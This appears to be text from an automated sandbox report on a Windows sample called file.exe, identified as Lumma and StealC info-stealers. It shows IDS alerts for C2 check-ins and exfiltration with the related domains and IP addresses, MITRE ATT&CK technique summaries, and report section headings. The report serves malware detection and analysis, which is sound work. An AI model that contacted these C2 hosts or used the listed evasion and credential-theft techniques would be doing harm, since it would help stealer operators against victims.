Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49762 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49750 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49793 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.9:49464 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49782 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057120 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI) : 192.168.2.9:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49844 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49793 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49750 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49782 -> 188.114.97.3:443

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre